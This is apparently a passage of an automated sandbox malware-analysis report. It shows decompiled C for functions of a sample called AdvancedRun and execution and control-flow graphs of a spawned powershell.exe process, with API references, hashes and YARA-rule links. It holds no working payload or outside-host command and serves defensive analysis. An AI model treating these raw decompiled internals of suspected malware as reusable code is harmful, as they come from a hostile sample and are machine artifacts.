				intOrPtr _t33;
				intOrPtr _t36;
				signed int _t48;
				signed int _t58;
				signed int _t59;
				void** _t62;
				void** _t63;
				signed int* _t66;

				_t66 = __eax;
				_t32 = wcslen(_a4);
				_t48 =  *(_t66 + 4);
				_t58 = _t48 + _t32;
				_v12 = _t58;
				_t59 = _t58 + 1;
				_v8 = _t32;
				_t33 =  *((intOrPtr*)(_t66 + 0x14));
				 *(_t66 + 4) = _t59;
				_t62 = _t66 + 0x10;
				if(_t59 != 0xffffffff) {
					E00404951(_t66, _t59, _t62, 2, _t33);
				} else {
					free( *_t62);
				}
				_t60 =  *(_t66 + 0x1c);
				_t36 =  *((intOrPtr*)(_t66 + 0x18));
				_t63 = _t66 + 0xc;
				if( *(_t66 + 0x1c) != 0xffffffff) {
					E00404951(_t66 + 8, _t60, _t63, 4, _t36);
				} else {
					free( *_t63);
				}
				memcpy( *(_t66 + 0x10) + _t48 * 2, _a4, _v8 + _v8);
				 *((short*)( *(_t66 + 0x10) + _v12 * 2)) =  *( *(_t66 + 0x10) + _v12 * 2) & 0x00000000;
				 *( *_t63 +  *(_t66 + 0x1c) * 4) = _t48;
				 *(_t66 + 0x1c) =  *(_t66 + 0x1c) + 1;
				_t30 =  *(_t66 + 0x1c) - 1; // -1
				return _t30;
			}















                                                                  0x004054ea
                                                                  0x004054ec
                                                                  0x004054f1
                                                                  0x004054f4
                                                                  0x004054f7
                                                                  0x004054fa
                                                                  0x004054fe
                                                                  0x00405501
                                                                  0x00405505
                                                                  0x00405508
                                                                  0x0040550b
                                                                  0x0040551b
                                                                  0x0040550d
                                                                  0x0040550f
                                                                  0x0040550f
                                                                  0x00405521
                                                                  0x00405527
                                                                  0x0040552b
                                                                  0x0040552e
                                                                  0x0040553f
                                                                  0x00405530
                                                                  0x00405532
                                                                  0x00405532
                                                                  0x00405556
                                                                  0x00405561
                                                                  0x0040556e
                                                                  0x00405571
                                                                  0x00405578
                                                                  0x0040557e

                                                                  APIs
                                                                  • wcslen.MSVCRT ref: 004054EC
                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 0040550F
                                                                    • Part of subcall function 00404951: malloc.MSVCRT ref: 0040496D
                                                                    • Part of subcall function 00404951: memcpy.MSVCRT ref: 00404985
                                                                    • Part of subcall function 00404951: free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,?,00405830,?,00000000,?,00000000), ref: 00405532
                                                                  • memcpy.MSVCRT ref: 00405556
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: free$memcpy$mallocwcslen
                                                                  • String ID:
                                                                  • API String ID: 726966127-0
                                                                  • Opcode ID: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                  • Instruction ID: a1978c74b5bce8e8bf6bff77aa8c6c4d26791a9d8288a70caf523018dd8727ee
                                                                  • Opcode Fuzzy Hash: 5c7b7bb3817ea86daae365c80c5e036228049141d00745b32d160c1d254800f2
                                                                  • Instruction Fuzzy Hash: 14216FB1500704EFC720DF68D881C9BB7F5EF483247208A6EF456A7691D735B9158B98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405ADF, Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 81%
                                                                  			E00405ADF() {
				void* _t25;
				signed int _t27;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				signed int _t50;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t60;

				_t60 =  *0x41c470;
				if(_t60 == 0) {
					_t50 = 2;
					 *0x41c470 = 0x8000;
					_t27 = 0x8000 * _t50;
					 *0x41c474 = 0x100;
					 *0x41c478 = 0x1000;
					_push( ~(0 | _t60 > 0x00000000) | _t27);
					L0040B26C();
					 *0x41c458 = _t27;
					_t52 = 4;
					_t29 =  *0x41c474 * _t52;
					_push( ~(0 | _t60 > 0x00000000) | _t29);
					L0040B26C();
					 *0x41c460 = _t29;
					_t54 = 4;
					_t31 =  *0x41c474 * _t54;
					_push( ~(0 | _t60 > 0x00000000) | _t31);
					L0040B26C();
					 *0x41c464 = _t31;
					_t56 = 2;
					_t33 =  *0x41c478 * _t56;
					_push( ~(0 | _t60 > 0x00000000) | _t33);
					L0040B26C();
					 *0x41c45c = _t33;
					return _t33;
				}
				return _t25;
			}













                                                                  0x00405adf
                                                                  0x00405ae6
                                                                  0x00405af5
                                                                  0x00405af6
                                                                  0x00405afb
                                                                  0x00405b00
                                                                  0x00405b0a
                                                                  0x00405b18
                                                                  0x00405b19
                                                                  0x00405b1e
                                                                  0x00405b2c
                                                                  0x00405b2d
                                                                  0x00405b36
                                                                  0x00405b37
                                                                  0x00405b3c
                                                                  0x00405b4a
                                                                  0x00405b4b
                                                                  0x00405b54
                                                                  0x00405b55
                                                                  0x00405b5a
                                                                  0x00405b68
                                                                  0x00405b69
                                                                  0x00405b72
                                                                  0x00405b73
                                                                  0x00405b7b
                                                                  0x00000000
                                                                  0x00405b7b
                                                                  0x00405b80

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp Download File
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp Download File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@
                                                                  • String ID:
                                                                  • API String ID: 1033339047-0
                                                                  • Opcode ID: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                  • Instruction ID: f2da1691ca32ceef4ebb7ffb039160a3052a1a0853e807cf512b268ff05fa3b0
                                                                  • Opcode Fuzzy Hash: fe94db315f44a6ad13eaa6f5e90a6aac049872e3421695f41c948c22f86c7b92
                                                                  • Instruction Fuzzy Hash: 850121B12C63005EE758DB38EDAB77A36A4E748754F00913EA146CE1F5EB7454408E4C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Analysis Process: powershell.exe PID: 6176 Parent PID: 4912 powershell.exeCOMMON

                                                                  Execution Graph

                                                                  Execution Coverage:12.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:42
                                                                  Total number of Limit Nodes:4

                                                                  Graph

                                                                  execution_graph 15790 a05618 15791 a05632 15790->15791 15792 a0564e 15791->15792 15795 a05748 15791->15795 15799 a05739 15791->15799 15796 a0578f 15795->15796 15797 a0583c RtlDecodePointer 15796->15797 15798 a05861 15796->15798 15797->15798 15798->15792 15801 a05742 15799->15801 15803 a056d9 15799->15803 15800 a0583c RtlDecodePointer 15802 a05861 15800->15802 15801->15800 15801->15802 15802->15792 15803->15792 15804 2ff1624 15805 2ff1632 15804->15805 15806 2ff15e2 15804->15806 15809 2ff46a8 15806->15809 15807 2ff1621 15810 2ff46c2 15809->15810 15811 2ff46e7 15810->15811 15814 2ff4770 15810->15814 15818 2ff4760 15810->15818 15811->15807 15815 2ff4783 15814->15815 15822 2ff47d8 15815->15822 15819 2ff4770 15818->15819 15821 2ff47d8 GetFileAttributesW 15819->15821 15820 2ff47a1 15820->15811 15821->15820 15823 2ff47fd 15822->15823 15824 2ff47a1 15823->15824 15828 2ff4a78 15823->15828 15824->15811 15825 2ff48c2 15825->15824 15826 2ff4a78 GetFileAttributesW 15825->15826 15826->15824 15834 2ff4a78 GetFileAttributesW 15828->15834 15835 2ff4ad8 15828->15835 15829 2ff4aa2 15830 2ff4aa8 15829->15830 15840 2ff42a0 15829->15840 15830->15825 15834->15829 15836 2ff4af0 15835->15836 15837 2ff4b05 15836->15837 15838 2ff42a0 GetFileAttributesW 15836->15838 15837->15829 15839 2ff4b36 15838->15839 15839->15829 15841 2ff4fc0 GetFileAttributesW 15840->15841 15843 2ff4b36 15841->15843 15843->15825

                                                                  Executed Functions

                                                                  Function 02FFCEF8, Relevance: 33.2, Strings: 25, Instructions: 1925COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 2ffcef8-2fff111 call 2ff6dc0 call 2ff6de0 547 2fff11b-2fff12c 0->547 549 2fff132-2fff184 547->549
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.433259990.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_2ff0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$\l$\l$\l$\l
                                                                  • API String ID: 0-1760859083
                                                                  • Opcode ID: 4996e1c7ca5401efc3cf8786819a3bbac511a1538303a17e2b2025486e659b04
                                                                  • Instruction ID: bd73ac85a0ea54971c1c0b4ce50393b501d1bef206a8694ac931c94de42d5473
                                                                  • Opcode Fuzzy Hash: 4996e1c7ca5401efc3cf8786819a3bbac511a1538303a17e2b2025486e659b04
                                                                  • Instruction Fuzzy Hash: BC034A7190411C8FEB25EB60C890BDE77BAAF8A714F1150E9D20A6F260DF309E85DF56
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02FFCF08, Relevance: 33.2, Strings: 25, Instructions: 1919COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 555 2ffcf08-2fff12c call 2ff6dc0 call 2ff6de0 1104 2fff132-2fff184 555->1104
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.433259990.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_2ff0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$D!l$\l$\l$\l$\l
                                                                  • API String ID: 0-1760859083
                                                                  • Opcode ID: d5e51ee73064b7e889f73ab5dd394531f1991cd1adcea132bcbac3771ca107c6
                                                                  • Instruction ID: 445c8afd19e30650eb9c2db6674b3ba6e50b42327236ef188322177d47ed8ae4
                                                                  • Opcode Fuzzy Hash: d5e51ee73064b7e889f73ab5dd394531f1991cd1adcea132bcbac3771ca107c6
                                                                  • Instruction Fuzzy Hash: DE034A71A0411C8FEB25EB60C890BDE77BAAF89714F1150E9D20A6F260DF309E85DF56
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00A05739, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1843 a05739-a05740 1844 a05742-a0579d 1843->1844 1845 a056d9-a0571a 1843->1845 1849 a057d2-a057de 1844->1849 1850 a0579f-a057b0 1844->1850 1859 a05722-a0572c 1845->1859 1860 a0571c 1845->1860 1852 a057e0-a057f0 1849->1852 1853 a05812-a05819 1849->1853 1850->1849 1852->1853 1854 a05832-a0583a 1853->1854 1855 a0581b-a0582b 1853->1855 1857 a05871-a05880 1854->1857 1858 a0583c-a0585f RtlDecodePointer 1854->1858 1855->1854 1862 a05861-a05867 1858->1862 1863 a05868-a0586f 1858->1863 1860->1859 1862->1863 1863->1857
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.428231811.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_a00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: DecodePointer
                                                                  • String ID:
                                                                  • API String ID: 3527080286-0
                                                                  • Opcode ID: 50d38899a3d435560e4ad5aec015da3702f40542cb2313dca840373f569f6ccc
                                                                  • Instruction ID: 7ffcdf2285667f10e84d427956c975d393e4e876ec8c6853575129122a73892f
                                                                  • Opcode Fuzzy Hash: 50d38899a3d435560e4ad5aec015da3702f40542cb2313dca840373f569f6ccc
                                                                  • Instruction Fuzzy Hash: A6418AB0D04B488EEB50DF7AD4887DABBF2EB84314F28C46DD8099B291D7755845DF60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00A05748, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1866 a05748-a0579d 1868 a057d2-a057de 1866->1868 1869 a0579f-a057b0 1866->1869 1870 a057e0-a057f0 1868->1870 1871 a05812-a05819 1868->1871 1869->1868 1870->1871 1872 a05832-a0583a 1871->1872 1873 a0581b-a0582b 1871->1873 1874 a05871-a05880 1872->1874 1875 a0583c-a0585f RtlDecodePointer 1872->1875 1873->1872 1877 a05861-a05867 1875->1877 1878 a05868-a0586f 1875->1878 1877->1878 1878->1874
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.428231811.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_a00000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: DecodePointer
                                                                  • String ID:
                                                                  • API String ID: 3527080286-0
                                                                  • Opcode ID: 57a21c54d675187cf667bb0fd1e41bf6e095a2e49eaefd78ed0cfe95406fd38c
                                                                  • Instruction ID: a18101c06d9091241fad0f4b64132dc3cfb0c4f69946cb4b1fe8097f827cc2a2
                                                                  • Opcode Fuzzy Hash: 57a21c54d675187cf667bb0fd1e41bf6e095a2e49eaefd78ed0cfe95406fd38c
                                                                  • Instruction Fuzzy Hash: A82187B4D04B488EEB20CF7AD48838AFBF6AB84310F28C42DC85997285D7746885CF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02FF42A0, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1880 2ff42a0-2ff500a 1883 2ff500c-2ff500f 1880->1883 1884 2ff5012-2ff503d GetFileAttributesW 1880->1884 1883->1884 1885 2ff503f-2ff5045 1884->1885 1886 2ff5046-2ff5063 1884->1886 1885->1886
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 02FF5030
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.433259990.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_2ff0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 5321c7a361d11f8e31a61722fb78e7cca4385767e0630afcb15f8bc43216d644
                                                                  • Instruction ID: 786fe06e69a5850610315b95187559bce775084239c42e678f8d7e6efc10aacd
                                                                  • Opcode Fuzzy Hash: 5321c7a361d11f8e31a61722fb78e7cca4385767e0630afcb15f8bc43216d644
                                                                  • Instruction Fuzzy Hash: 1D2136B1D0461A9BCB10CF9AD44479EFBF4FF48654F10812AEA18B7650D774A900CFE1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 02FF4FB9, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1889 2ff4fb9-2ff500a 1892 2ff500c-2ff500f 1889->1892 1893 2ff5012-2ff503d GetFileAttributesW 1889->1893 1892->1893 1894 2ff503f-2ff5045 1893->1894 1895 2ff5046-2ff5063 1893->1895 1894->1895
                                                                  APIs
                                                                  • GetFileAttributesW.KERNELBASE(00000000), ref: 02FF5030
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.433259990.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_2ff0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 6d32a7b8980e47d75507f3242bedd45f56516544b7064d517f3db5dd7d745663
                                                                  • Instruction ID: 63720d1c00d74a3671d3d815975ddee940483252e0bc884c6ef590c1bcc99ce2
                                                                  • Opcode Fuzzy Hash: 6d32a7b8980e47d75507f3242bedd45f56516544b7064d517f3db5dd7d745663
                                                                  • Instruction Fuzzy Hash: AD2136B1D0425A9BCB10CFAAD44479EFBF4BF48714F14816AE918B7640C774A904CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Function 02FF2780, Relevance: 1.8, Strings: 1, Instructions: 588COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000F.00000002.433259990.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_15_2_2ff0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: d
                                                                  • API String ID: 0-2564639436
                                                                  • Opcode ID: 6914d7fc85597290b4d3d99efea8b7d7ec94cacf9366d85114dff00bd33ecf27
                                                                  • Instruction ID: 9ba715c241d3b81ae79a2f293dce5c6dc4ad8854ef0a17b51de090b38be75c96
                                                                  • Opcode Fuzzy Hash: 6914d7fc85597290b4d3d99efea8b7d7ec94cacf9366d85114dff00bd33ecf27
                                                                  • Instruction Fuzzy Hash: 41329E34A046058FE714DF64C480A6ABBF2FF89354F25C5A9DA5A9B3A5CB34EC41CF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%